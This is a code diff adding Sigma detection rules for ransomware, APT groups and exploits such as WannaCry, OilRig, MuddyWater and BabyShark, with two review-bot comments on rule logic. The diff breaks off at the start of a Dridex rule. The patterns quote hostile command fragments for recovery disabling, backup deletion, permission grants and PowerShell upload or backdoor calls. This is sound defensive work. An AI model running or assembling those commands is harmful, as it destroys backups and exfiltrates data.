@@ -0,0 +1,68 @@ +title: WannaCry Ransomware Activity +id: 41d40bff-377a-43e2-8e1b-2e543069e079 +status: test +description: Detects WannaCry ransomware activity +references: + - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 +author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro +date: 2019/01/16 +modified: 2023/02/03 +tags: + - attack.lateral_movement + - attack.t1210 + - attack.discovery + - attack.t1083 + - attack.defense_evasion + - attack.t1222.001 + - attack.impact + - attack.t1486 + - attack.t1490 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + - NewProcessName|endswith: + - \tasksche.exe + - \mssecsvc.exe + - \taskdl.exe + - \taskhsvc.exe + - \taskse.exe + - \111.exe + - \lhdfrgui.exe + # - '\diskpart.exe' # cannot be used in a rule of level critical + - \linuxnew.exe + - \wannacry.exe + - NewProcessName|contains: WanaDecryptor + selection2: + - CommandLine|contains|all: + - icacls + - /grant + - Everyone:F + - /T + - /C + - /Q + - CommandLine|contains|all: + - bcdedit + - /set + - '{default}' + - recoveryenabled + - no + - CommandLine|contains|all: + - wbadmin + - delete + - catalog + - -quiet + - CommandLine|contains: '@Please_Read_Me@.txt' + condition: process_creation and (1 of selection*) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml new file mode 100644 index 000000000..c0ca40cf5 --- /dev/null 
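Review bot: In `selection2`, the bcdedit entry lists `- no` as its own `contains|all` token; a two-letter substring is satisfied by any command line containing `no` anywhere (paths, account names), so it does little to separate `recoveryenabled no` from a `recoveryenabled yes` issued by an administrator. If the reported command uses a single space, replace the two tokens `- recoveryenabled` and `- no` with `- 'recoveryenabled no'`. The `condition` uses `1 of selection*` (no underscore), which is correct for `selection1`/`selection2` but differs from the `selection_*` naming the rest of this commit follows.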
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml @@ -0,0 +1,33 @@ +title: Potential APT10 Cloud Hopper Activity +id: 966e4016-627f-44f7-8341-f394905c361f +status: test +description: Detects potential process and execution activity related to APT10 Cloud Hopper operation +references: + - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf +author: Florian Roth (Nextron Systems) +date: 2017/04/07 +modified: 2023/03/08 +tags: + - attack.execution + - attack.g0045 + - attack.t1059.005 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_cscript: + CommandLine|contains: '.vbs /shell ' + NewProcessName|endswith: \cscript.exe + selection_csvde: + CommandLine|contains|all: + - csvde -f C:\windows\web\ + - .log + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml new file mode 100644 index 000000000..7464fa4f8 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml 
@@ -0,0 +1,31 @@ +title: Ps.exe Renamed SysInternals Tool +id: 18da1007-3f26-470f-875d-f77faf1cab31 +status: test +description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report +references: + - https://www.us-cert.gov/ncas/alerts/TA17-293A +author: Florian Roth (Nextron Systems) +date: 2017/10/22 +modified: 2023/05/02 +tags: + - attack.defense_evasion + - attack.g0035 + - attack.t1036.003 + - car.2013-05-009 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - ps.exe -accepteula + - -s cmd /c netstat + condition: process_creation and selection +falsepositives: + - Renamed SysInternals tool +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml new file mode 100644 index 000000000..d20bd4338 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml 
@@ -0,0 +1,33 @@ +title: Lazarus System Binary Masquerading +id: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b +status: test +description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location +references: + - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf +author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1) +date: 2020/06/03 +modified: 2023/03/10 +tags: + - attack.defense_evasion + - attack.t1036.005 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + NewProcessName|endswith: + - \msdtc.exe + - \gpsvc.exe + filter: + NewProcessName|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + condition: process_creation and (selection and not filter) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml new file mode 100644 index 000000000..aa7b7a3a4 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml 
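Review bot: `filter` excludes only paths starting with `C:\Windows\System32\` and `C:\Windows\SysWOW64\`, so on a host whose Windows installation lives on another drive letter the legitimate `msdtc.exe` will alert on every start. Anchoring on the drive-agnostic form, `NewProcessName|contains:` with `- :\Windows\System32\` and `- :\Windows\SysWOW64\`, should keep the exclusion equally tight (a colon is not permitted inside an NTFS file name, so it can only follow the drive letter) while covering non-`C:` installs.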
@@ -0,0 +1,32 @@ +title: Turla Service Install +id: 1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4 +status: test +description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET +references: + - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/ +author: Florian Roth (Nextron Systems) +date: 2017/03/31 +modified: 2021/11/30 +tags: + - attack.persistence + - attack.g0010 + - attack.t1543.003 + - detection.emerging_threats +logsource: + product: windows + service: system +detection: + system: + Channel: System + selection: + Provider_Name: Service Control Manager + EventID: 7045 + ServiceName: + - srservice + - ipvpn + - hkmsvc + condition: system and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml new file mode 100644 index 000000000..47e6633a7 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml 
@@ -0,0 +1,29 @@ +title: Turla PNG Dropper Service +id: 1228f8e2-7e79-4dea-b0ad-c91f1d5016c1 +status: test +description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018 +references: + - https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/ +author: Florian Roth (Nextron Systems) +date: 2018/11/23 +modified: 2021/11/30 +tags: + - attack.persistence + - attack.g0010 + - attack.t1543.003 + - detection.emerging_threats +logsource: + product: windows + service: system +detection: + system: + Channel: System + selection: + Provider_Name: Service Control Manager + EventID: 7045 + ServiceName: WerFaultSvc + condition: system and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml new file mode 100644 index 000000000..57766516e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml 
@@ -0,0 +1,41 @@ +title: Elise Backdoor Activity +id: e507feb7-5f73-4ef6-a970-91bb6f6d744f +status: test +description: Detects Elise backdoor activity used by APT32 +references: + - https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting + - https://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +date: 2018/01/31 +modified: 2023/03/09 +tags: + - attack.g0030 + - attack.g0050 + - attack.s0081 + - attack.execution + - attack.t1059.003 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_other_svchost: + NewProcessName|endswith: \Microsoft\Network\svchost.exe + selection_other_del: + CommandLine|contains|all: + - \Windows\Caches\NavShExt.dll + - /c del + selection_dll_path: + CommandLine|endswith: + - \AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll + - \AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll + selection_dll_function: + CommandLine|contains: ',Setting' + condition: process_creation and (1 of selection_other_* or all of selection_dll_*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml new file mode 100644 index 000000000..8faf6d754 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml 
@@ -0,0 +1,35 @@ +title: APT27 - Emissary Panda Activity +id: 9aa01d62-7667-4d3b-acb8-8cb5103e2014 +status: test +description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 +references: + - https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965 + - https://twitter.com/cyb3rops/status/1168863899531132929 + - https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/ +author: Florian Roth (Nextron Systems) +date: 2018/09/03 +modified: 2023/03/09 +tags: + - attack.defense_evasion + - attack.t1574.002 + - attack.g0027 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_sllauncher: + ParentProcessName|endswith: \sllauncher.exe + NewProcessName|endswith: \svchost.exe + selection_svchost: + CommandLine|contains: -k + ParentProcessName|contains: \AppData\Roaming\ + NewProcessName|endswith: \svchost.exe + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml new file mode 100644 index 000000000..53137427f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml 
@@ -0,0 +1,44 @@ +title: Sofacy Trojan Loader Activity +id: ba778144-5e3d-40cf-8af9-e28fb1df1e20 +status: test +description: Detects Trojan loader activity as used by APT28 +references: + - https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/ + - https://www.hybrid-analysis.com/sample/ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8?environmentId=110 + - https://twitter.com/ClearskySec/status/960924755355369472 +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +date: 2018/03/01 +modified: 2023/05/31 +tags: + - attack.defense_evasion + - attack.execution + - attack.g0007 + - attack.t1059.003 + - attack.t1218.011 + - car.2013-10-002 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_path: + CommandLine|contains: + - '%LOCALAPPDATA%' + - \AppData\Local\ + NewProcessName|endswith: \rundll32.exe + selection_extensions: + - CommandLine|contains: .dat", + - CommandLine|endswith: + - '.dll #1' + - '.dll" #1' + - .dll",#1 + filter_main_exclude_temp: + CommandLine|contains: \AppData\Local\Temp\ + condition: process_creation and (all of selection_* and not 1 of filter_main_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml new file mode 100644 index 000000000..eaf3596f7 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml 
@@ -0,0 +1,35 @@ +title: APT29 2018 Phishing Campaign CommandLine Indicators +id: 7453575c-a747-40b9-839b-125a0aae324b +related: + - id: 033fe7d6-66d1-4240-ac6b-28908009c71f + type: obsoletes +status: stable +description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant +references: + - https://twitter.com/DrunkBinary/status/1063075530180886529 + - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ + - https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign +author: Florian Roth (Nextron Systems), @41thexplorer +date: 2018/11/20 +modified: 2023/03/08 +tags: + - attack.execution + - attack.t1218.011 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + - CommandLine|contains: -noni -ep bypass $ + - CommandLine|contains|all: + - cyzfc.dat, + - PointFunctionCall + condition: process_creation and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml new file mode 100644 index 000000000..fe8c82050 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml 
@@ -0,0 +1,44 @@ +title: Potential MuddyWater APT Activity +id: 36222790-0d43-4fe8-86e4-674b27809543 +status: test +description: Detects potential Muddywater APT activity +references: + - https://www.mandiant.com/resources/blog/iranian-threat-group-updates-ttps-in-spear-phishing-campaign +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/03/10 +tags: + - attack.defense_evasion + - attack.execution + - attack.g0069 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_mshta: + CommandLine|contains|all: + - vbscript:Close(Execute("CreateObject( + - powershell + - -w 1 -exec Bypass + - \ProgramData\ + selection_survey: + CommandLine|contains|all: + - Win32_OperatingSystem + - Win32_NetworkAdapterConfiguration + - root\SecurityCenter2 + - '[System.Net.DNS]' + selection_pwsh_backdoor: + CommandLine|contains|all: + - '[Convert]::ToBase64String' + - '[System.Text.Encoding]::UTF8.GetString]' + - GetResponse().GetResponseStream() + - '[System.Net.HttpWebRequest]::Create(' + - '-bxor ' + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml new file mode 100644 index 000000000..643823ade --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml 
@@ -0,0 +1,56 @@ +title: OilRig APT Activity +id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 +related: + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System + type: similar + - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security + type: similar + - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry + type: similar +status: test +description: Detects OilRig activity as reported by Nyotron in their March 2018 report +references: + - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +date: 2018/03/23 +modified: 2023/03/08 +tags: + - attack.persistence + - attack.g0049 + - attack.t1053.005 + - attack.s0111 + - attack.t1543.003 + - attack.defense_evasion + - attack.t1112 + - attack.command_and_control + - attack.t1071.004 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_schtasks: + CommandLine|contains|all: + - SC Scheduled Scan + - \microsoft\Taskbar\autoit3.exe + selection_temp: + NewProcessName|contains: \Windows\Temp\DB\ + NewProcessName|endswith: .exe + selection_service: + CommandLine|contains: + - i + - u + NewProcessName: C:\Windows\system32\Service.exe + selection_autoit: + CommandLine|contains|all: + - nslookup.exe + - -q=TXT + ParentProcessName|endswith: \local\microsoft\Taskbar\autoit3.exe + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml new file mode 100644 index 000000000..ebee13389 --- /dev/null 
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml @@ -0,0 +1,43 @@ +title: OilRig APT Schedule Task Persistence - Security +id: c0580559-a6bd-4ef6-b9b7-83703d98b561 +related: + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System + type: similar + - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry + type: similar + - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation + type: similar +status: test +description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report +references: + - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +date: 2018/03/23 +modified: 2023/03/08 +tags: + - attack.persistence + - attack.g0049 + - attack.t1053.005 + - attack.s0111 + - attack.t1543.003 + - attack.defense_evasion + - attack.t1112 + - attack.command_and_control + - attack.t1071.004 + - detection.emerging_threats +logsource: + product: windows + service: security +detection: + security: + Channel: Security + selection_service: + EventID: 4698 + TaskName: + - SC Scheduled Scan + - UpdatMachine + condition: security and selection_service +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml new file mode 100644 index 000000000..608674039 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml 
@@ -0,0 +1,44 @@ +title: OilRig APT Schedule Task Persistence - System +id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 +related: + - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security + type: similar + - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry + type: similar + - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation + type: similar +status: experimental +description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report +references: + - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +date: 2018/03/23 +modified: 2023/03/08 +tags: + - attack.persistence + - attack.g0049 + - attack.t1053.005 + - attack.s0111 + - attack.t1543.003 + - attack.defense_evasion + - attack.t1112 + - attack.command_and_control + - attack.t1071.004 + - detection.emerging_threats +logsource: + product: windows + service: system +detection: + system: + Channel: System + selection: + Provider_Name: Service Control Manager + EventID: 7045 + ServiceName: + - SC Scheduled Scan + - UpdatMachine + condition: system and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml new file mode 100644 index 000000000..ca39ec945 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml 
@@ -0,0 +1,34 @@ +title: Defrag Deactivation +id: 958d81aa-8566-4cea-a565-59ccd4df27b0 +status: test +description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group +references: + - https://securelist.com/apt-slingshot/84312/ +author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) +date: 2019/03/04 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1053.005 + - attack.s0111 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - /delete + - /change + CommandLine|contains|all: + - /TN + - \Microsoft\Windows\Defrag\ScheduledDefrag + NewProcessName|endswith: \schtasks.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml new file mode 100644 index 000000000..f50398291 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml 
@@ -0,0 +1,32 @@ +title: Defrag Deactivation - Security +id: c5a178bf-9cfb-4340-b584-e4df39b6a3e7 +related: + - id: 958d81aa-8566-4cea-a565-59ccd4df27b0 + type: derived +status: test +description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group +references: + - https://securelist.com/apt-slingshot/84312/ +author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) +date: 2019/03/04 +modified: 2022/11/27 +tags: + - attack.persistence + - attack.t1053 + - attack.s0111 + - detection.emerging_threats +logsource: + product: windows + service: security + definition: 'Requirements: Audit Policy : Audit Other Object Access Events > Success' +detection: + security: + Channel: Security + selection: + EventID: 4701 + TaskName: \Microsoft\Windows\Defrag\ScheduledDefrag + condition: security and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml new file mode 100644 index 000000000..a44892193 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml 
@@ -0,0 +1,25 @@ +title: TropicTrooper Campaign November 2018 +id: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79 +status: stable +description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia +references: + - https://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/ +author: '@41thexplorer, Microsoft Defender ATP' +date: 2019/11/12 +modified: 2020/08/27 +tags: + - attack.execution + - attack.t1059.001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc + condition: process_creation and selection +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml new file mode 100644 index 000000000..7fe19772e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml 
@@ -0,0 +1,35 @@ +title: Potential BearLPE Exploitation +id: 931b6802-d6a6-4267-9ffa-526f57f22aaf +status: test +description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par +references: + - https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp +author: Olaf Hartong +date: 2019/05/22 +modified: 2023/01/26 +tags: + - attack.privilege_escalation + - attack.t1053.005 + - car.2013-08-001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe + selection_cli: + CommandLine|contains|all: + - /change + - /TN + - /RU + - /RP + condition: process_creation and (all of selection*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml new file mode 100644 index 000000000..f51deb85f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml 
@@ -0,0 +1,37 @@ +title: Exploiting CVE-2019-1388 +id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c +status: stable +description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM +references: + - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388 + - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege +author: Florian Roth (Nextron Systems) +date: 2019/11/20 +modified: 2022/05/27 +tags: + - attack.privilege_escalation + - attack.t1068 + - cve.2019.1388 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: ' http' + ParentProcessName|endswith: \consent.exe + NewProcessName|endswith: \iexplore.exe + rights1: + MandatoryLabel: S-1-16-16384 + rights2: + SubjectUserName|contains: # covers many language settings + - AUTHORI + - AUTORI + condition: process_creation and (selection and ( rights1 or rights2 )) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml new file mode 100644 index 000000000..6f56ab7b3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml 
@@ -0,0 +1,38 @@ +title: Potential Baby Shark Malware Activity +id: 2b30fa36-3a18-402f-a22d-bf4ce2189f35 +status: test +description: Detects activity that could be related to Baby Shark malware +references: + - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ +author: Florian Roth (Nextron Systems) +date: 2019/02/24 +modified: 2023/03/08 +tags: + - attack.execution + - attack.defense_evasion + - attack.discovery + - attack.t1012 + - attack.t1059.003 + - attack.t1059.001 + - attack.t1218.005 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + - CommandLine|contains|all: + - powershell.exe mshta.exe http + - .hta + - CommandLine|contains: + - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" + - cmd.exe /c taskkill /im cmd.exe + - (New-Object System.Net.WebClient).UploadFile('http + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml new file mode 100644 index 000000000..17f16035e --- /dev/null +++ 